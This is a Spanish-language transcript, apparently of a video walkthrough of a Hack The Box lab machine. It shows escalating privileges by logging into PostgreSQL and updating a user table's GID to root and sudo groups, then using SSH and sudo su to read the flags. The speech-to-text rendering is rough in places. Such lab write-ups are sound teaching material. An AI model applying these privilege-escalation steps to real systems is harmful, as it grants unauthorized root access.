SQL. Aquí están dando problemas las comillas, esto, ahora, así, ahora sí. Ahora, psql menos h 127.0.3.1 menos d unix menos u unix sus rmgr y ahora ponemos la contraseña, que es la correcta. Efectivamente ya estamos dentro de Postgres SQL, entonces ahora lo que podemos hacer es, ya tenemos la base de datos abierta, vamos a cerrar esto, vamos a cerrar esto por aquí, ¿vale? Así lo tenemos todo en grande y se ve mejor. Y ahora para interactuar con la base de datos, lo que vamos a hacer es barra invertida dt de database, le damos a enter y nos aparecen cuatro tablas o cuatro bases de datos, entiendo que es la tabla de la base de datos, ¿vale? Y entonces para entrar dentro o para ver el contenido, a mí me llama la atención, por ejemplo, el passwd barra baja table, ¿no? Porque, bueno, passwd puede ser las contraseñas. Entonces hacemos un select all from passwd table, punto y coma, le damos a enter y nos aparece un usuario. Este usuario se llama Tricia, este usuario lo hemos visto antes en la gestión de usuarios dentro de la plataforma, tiene una contraseña que está hasheada, tiene el UID del usuario, tiene el GID del usuario, a qué grupo pertenece, en función al grupo que pertenece o al usuario que pertenece, tiene diferentes permisos en el sistema. Vemos aquí un directorio que vemos barra barn, barra gil, barra home, que entiendo que esto es el contenedor o la jaula donde entramos al principio y no podíamos hacer gran cosa, no teníamos permisos, no podíamos ver ni las carpetas que había en los directorios, entonces no teníamos mucha capacidad de movimiento y luego tiene una shell asignada. Entonces, ¿qué podemos entender aquí? Que si yo creo un usuario dentro de la administración de usuarios de la aplicación, lo voy a ver reflejado aquí y voy a poder manipularlo. Quizás puede ser que eso funcione. Entonces vamos a irnos a nuestra página que está por aquí, y lo que vamos a hacer es, vamos a aceptar los términos. Por lo que veo, parece que cuando entramos dentro del equipo, este navegador se queda como colgado, o sea, se queda congelado, no podemos entrar a admin. Sí podemos entrar a intra, pero admin se queda cargando y no termina de cargar. Vemos que Burp Suite está desactivado. Entonces, para hacerlo de otra opción, lo que podemos hacer es, dentro del Burp Suite, ¿vale? Es abrir el navegador, ¿vale? He puesto otra vez la cookie de sello, todo ese proceso, hemos llegado aquí. Entonces, dentro del control de los usuarios, si entramos dentro, vemos el usuario Tricia, que es el mismo que hemos visto aquí en la base de datos, ¿vale? Que ahora mismo está, he salido de la base de datos para hacer diferentes comprobaciones, ¿vale? Entonces vamos a entrar ahora que lo tenemos el acceso por aquí. La contraseña la tengo por aquí. ¿Vale? Entonces ya estamos dentro de la base de datos. Entonces, si ahora me vuelvo al Burp Suite, ¿vale? Y aquí dentro voy a poner el usuario Rinku, nos dicen estas credenciales, ¿vale? Esto es lo que hemos hecho, hicimos antes. Entonces vamos a crear aquí, nos vamos a ir a HTV, ¿vale? Y vamos a poner las credenciales. No, estas credenciales, ¿no? Vale, esto lo puedo cerrar. Pongo las credenciales aquí. ¿Vale? Esto lo puedo cerrar. Me vuelvo a ir aquí, le doy a Continue. Entonces, aquí nos aparece el usuario con el UID 2020 y el GID 1001. Parece que el GID, el ID del grupo, es el que nos da los permisos, porque esto parece ser que en función de cuando tú creas un usuario, te va añadiendo como unos números. Y, por ejemplo, ponemos ahora Test. Le damos a Continue. Es como secuencial, digamos. Pero el GID nunca cambia. Entonces nos volvemos otra vez a la base de datos y aquí hacemos otra vez el Select All, Select All From. Paso WD. Table. Punto y coma. ¿Qué nos aparece? Ahora nos aparece otro usuario, dos usuarios que son los que hemos creado, que nos aparece el usuario Rinku y el usuario Test. Lo que ocurre aquí es que si entramos dentro del equipo con el usuario Rinku, con el usuario Test, no vamos a tener permisos de navegación por consola, ¿vale? Entonces, ¿por qué? Esos son por dos motivos. Por un lado, tenemos asignados los grupos o los permisos del grupo 1001, que ya hemos visto, que son Associates y demás. Entonces, no podemos hacer gran cosa. Y estamos en un directorio barra bar, barra hail, barra home. Entonces, no tenemos un directorio en el que navegar, ¿vale? Estamos como encapsulados o en un contenedor en el que no podemos salir. ¿Qué podemos hacer? Pues lo que podemos hacer es asignarle permisos. Por ejemplo, un GID 0, que el GID 0 es los permisos de root, ¿vale? Normalmente suelen ser los permisos de root para ver si podemos tener permisos de root, estar dentro del sistema y luego leer los archivos como si fuésemos root, ¿vale? Así que vamos a probarlo. Vamos a irnos hacia atrás. Salimos de esta pantalla, ¿vale? Y aquí yo voy a poner Update, ¿vale? Porque quiero actualizar. ¿Qué quiero actualizar? Quiero actualizar la tabla, ¿qué tabla? Pues passwd barra table y quiero setear, quiero poner, quiero actualizar el GID 0. Es decir, quiero poner el GID 0. ¿Dónde quiero ponerlo? Pues donde, que es where en inglés, donde GID sea, ¿vale? Sea 1001. Entonces vamos a setear el GID 0, donde el GID actualmente sea el 1001, en la tabla passwd table. Si todo está bien, actualizará tres equipos, porque hay tres equipos que tienen, perdón, tres usuarios que tienen el GID 1001. Le damos a Enter. Vale, pero no es lo, ah, vale, porque hace falta el punto y coma, si no, no se ejecuta. Le damos a Enter. Vale, da error. Vamos a ver la tabla, a ver si se ha modificado algo, aunque haya dado error. Vale, seguimos con el 1001, ¿ok? Entonces, es update passwd set GID 0 where GID GID es igual a 1001. Vale, ahora sí, parece ser que hará funcionado y se ha actualizado tres usuarios. ¿Qué es lo que pasa si ahora vamos a select all from passwd? ¿Qué tenemos aquí? Que es el GID 0. Vale, entonces ya tenemos permisos como root. ¿Qué es lo que pasa? Que aunque tengamos permisos como root, estamos dentro del grupo root, entiendo. ¿Qué es lo que pasa? Que al estar dentro del directorio, barra GID, barra HOME, no vamos a tener permisos de salir o a lo mejor luego podremos salir de ese contenedor y entrar dentro del equipo. Pero, ya que estamos dentro de la base de datos, vamos a intentar aplicar esos cambios para ver si también se aplican y podemos asignarnos un directorio, ¿no? Entonces, salimos fuera y el proceso es más o menos igual, es update passwd set home dir vale, que es el directorio home perdón, es el directorio personal donde sea quiero poner un barra home vale donde home dir sea barra bar barra GID barra home y esto lo cerramos con un punto y coma le damos a enter y nos dice que ha actualizado 3 entonces, si volvemos a copiar esto volvemos a pegar esto nos dice que nuestro usuario Rinku del cual sabemos la contraseña tiene el usuario 2020 el GID 0 y tiene el directorio home y tiene una shell asignada una base asignada entonces, ahora si salimos fuera y creo, si no me equivoco que para que se apliquen los cambios tenemos que salir también de la base de datos tenemos que darle primero update para que se actualice todo vale, y ahora salimos de la base de datos vamos a limpiar la pantalla lo tenemos aquí y ahora vamos a irnos a otra terminal así que vamos a abrir esto vale y vamos a hacer SSH Rinku por la IP 113 y la contraseña que no la tengo por aquí vamos a hacer CD Red Cross LS CAD Credentials y lo tenemos por aquí copiamos esto lo pegamos arriba ya estamos dentro entonces si ahora hacemos un LS LS ¿dónde estamos? ya no estamos donde antes porque si ahora hacemos por ejemplo un PWD estamos en barra home estamos en el directorio de trabajo de home vale, entonces vamos a ir al directorio principal y vemos que tenemos más capacidad de visualización de las carpetas vamos a intentar entrar a root desde root podemos entrar incluso dentro de root ¿por qué? porque tenemos el GID de root perdón si hacemos un ID vemos que el GID es cero es decir que somos root pero si cateamos el root al principio vale la TTI funciona un poco mal no tenemos permisos ¿por qué? menos L es menos L porque root solo lo puede leer las personas que estén en root es decir las personas que estén en el grupo de root no pueden leerlo ¿vale? podríamos hacerlo con sudo por ejemplo si hacemos un sudo cat root.txt lo ejecutaríamos como root vale esto funciona muy mal vamos a salir vamos a volver a entrar vale espérate vamos a salir limpiamos volvemos a entrar pegamos la contraseñal creo que la tengo por aquí a ver vamos aquí cat credencial esto lo copiamos esto lo pegamos esto lo cerramos por aquí ahora aquí hacemos un id vale entonces si nos volvemos a ir a root y hacemos un cat un un sudo cat a root.txt volvemos a pegar la contraseña ¿por qué no me la pega? export term igual a xterm vaya hombre export no puedo equivocarme xterm y ahora limpiamos la pantalla ok ahora si podemos limpiar la pantalla entonces ahora hacemos un ls-l de donde estamos no podemos leerlo porque el el equipo de root no puede leerlo si hacemos un sudo-l bueno primero vamos a ir a la barra a home barra penelope si no me equivoco aquí hay un directorio penelope penelope ls tenemos otra la de usuario entonces vamos a mirar la la bandera de usuario tampoco tenemos permisos hacemos un ls-l vale no podemos porque solamente el grupo de penelope puede leer este archivo entonces ¿qué podemos hacer ahora? no podemos leer ni root ni la bandera de root ni la bandera de penelope entonces a mí lo que se me ocurre ahora es ver los permisos de los grupos ¿vale? ¿por qué? porque si yo por ejemplo ahora hago un sudo-l y aquí pego la contraseña que no sé por qué me dice que está mal a ver vale ahora no sé por qué estaba mal me dice que Rinku no puede ejecutar nada como sudo en red cross ¿por qué no puedo ejecutar nada como sudo? pues porque yo entiendo que no estoy en el grupo de sudo por lo tanto como no puedo ejecutar no estoy en el grupo de sudo no puedo ejecutar sudo ¿cómo vemos los grupos? esto es algo que vemos por ejemplo en el curso de Kali Linux ¿vale? el gratuito que tenemos en el canal que por cierto os lo dejo por aquí y si hacemos un cat a etc barra groups group ¿vale? vemos aquí todos los usuarios por ejemplo vamos a ver el 1001 que tiene que estar por aquí entiendo si se almacena en este equipo ¿veis? aquí vemos el 1001 que es el que teníamos antes y hemos puesto el 0 que es el de root ¿vale? entonces ¿qué es lo que queremos hacer? pues podemos por ejemplo vamos a asignarnos directamente el permiso 27 el grupo 27 el GID 27 para poder ejecutar sudo y de esa manera poder elevar nuestros privilegios y ser usuario root con todos los permisos del usuario root ¿vale? entonces vamos a hacer eso tenemos aquí el usuario 27 entonces vamos a irnos a la pestaña número 3 que lo tengo por aquí tenemos aquí la consola de la terminal nos la movemos a la pestaña número 1 ¿vale? esto de aquí lo voy a cerrar entonces a la derecha tenemos la máquina de Red Cross donde tenemos la base de datos me la voy a mover aquí a la izquierda ¿vale? para tenerlo más ordenado como lo teníamos antes y ahora si hago otra vez un PSQL menos H127.0.0.1 menos D Unix menos U Unixus RM GR y la contraseña que la tengo aquí LS y un CAD de Postgres SQL y la tenemos aquí copiamos pegamos ya estamos dentro esto lo podemos cerrar y una vez aquí lo que vamos a hacer es pues por un lado vamos a mostrar otra vez las bases de datos para que no se me olviden y vamos a hacer Update Paso WD que es la tabla que queremos modificar Set en este caso el GID 27 porque es el que nos aparece en el etc group ¿vale? etc igual a 27 ¿dónde lo quiero modificar? pues donde actualmente el GID sea 0 entonces esto le ponemos punto y coma le damos a Enter se nos actualiza 3 hacemos otra vez Update ¿vale? para Update salimos de la base de datos para que se apliquen los cambios y ahora aquí en esta terminal lo que tenemos que hacer es Exit ¿vale? se termina la conexión limpiamos la pantalla tenemos que abrir otra otra pestaña otra ventana con la terminal para conseguir las credenciales que no las tengo ¿vale? esto puedo hacerlo más bajo y entonces aquí ahora hago un SSH a esta IP con esta contraseña la copio mal ¿vale? ahora entonces ahora hago un ID root no se han aplicado los cambios entiendo que si ahora hago un CD a home y hago un CD a Penelope y aquí hago un CAD de User ¿vale? hacemos internet permisos y no se nos han modificado los el grupo ¿vale? entonces vamos a cerrar esto cerramos esto ¿vale? vamos a volver a entrar a la base de datos a ver que ha podido pasar a modificar esto otra vez ¿vale? no se actualiza ninguno porque ya se han modificado los cambios entonces Update entonces vamos a copiarlo vamos a volver a hacerlo de nuevo esto lo pegamos aquí vamos a poner el 1001 que es el que teníamos al principio ¿vale? a ver si se modifica where GID es 27 ¿vale? da error ¿vale? se actualizan tres tablas entonces si ahora me voy aquí otra vez y entro por SSH con esta contraseña y hago un ID ¿vale? ahora se nos aplican los cambios cuando realmente hemos cambiado los permisos bueno a veces las máquinas de Hacktbox funcionan un poco regular pero bueno el procedimiento es este la metodología es esta entrar dentro como tenemos capacidad de cambiar los permisos pues vamos a cambiar los permisos para poder ejecutar dentro de la terminal con nuestro usuario como si fuésemos un usuario con privilegios entonces si ahora hacemos un sudo su y ponemos la contraseña de password ya estamos como root ¿vale? entonces hacemos ahora un ID ya seríamos root ¿vale? entonces ahora hacemos un ls si nos vamos dentro de PNLOP y hacemos otro ls hacemos un cat sport term igual a xterm ahora si limpiamos la consola hacemos un cat de user ahora si podemos ver la flag del usuario que el usuario es PNLOP y si nos va y hacemos un cat de root root root.txt podemos ver tanto la flag del usuario como la flag del root ¿por qué? porque hemos hemos modificado los permisos de nuestro usuario hemos podido elevar nuestros permisos haciendo un sudo su que es poder elevar nuestros privilegios a usuarios root y como tenemos contraseña válida pues nos ha permitido cambiarnos a root y como root tiene permisos a todos pues podemos ver tanto la flag del user como la flag de root hasta aquí la resolución de hoy espero que te haya gustado déjame un like déjame un comentario y obviamente pues suscríbete para seguir aprendiendo sobre ciberseguridad nos vemos en el siguiente vídeo paz bits y código chao y y y y y y Gracias.